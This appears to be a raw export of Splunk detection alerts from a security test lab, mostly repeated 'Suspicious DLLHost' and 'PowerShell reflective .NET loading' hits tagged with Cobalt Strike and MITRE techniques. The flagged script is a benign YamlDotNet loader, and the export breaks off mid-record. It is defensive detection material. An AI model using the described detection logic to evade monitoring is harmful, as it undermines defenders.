firstTime="2022-10-04T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664852400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664852400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4132", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664852400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664852400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="24908", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664852400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664852400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="23140", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664852400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664852400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="12116", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664852400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664852400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1096", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664852400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664852400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x614c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664852400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664852400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5a64", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664852400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664852400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x448", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664852400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664852400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x2f54", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664852400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664852400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1024", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664848800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664848800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="17272", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664848800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664848800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4378", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664855732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T02:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T02:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664855732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T02:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T02:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664855732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": 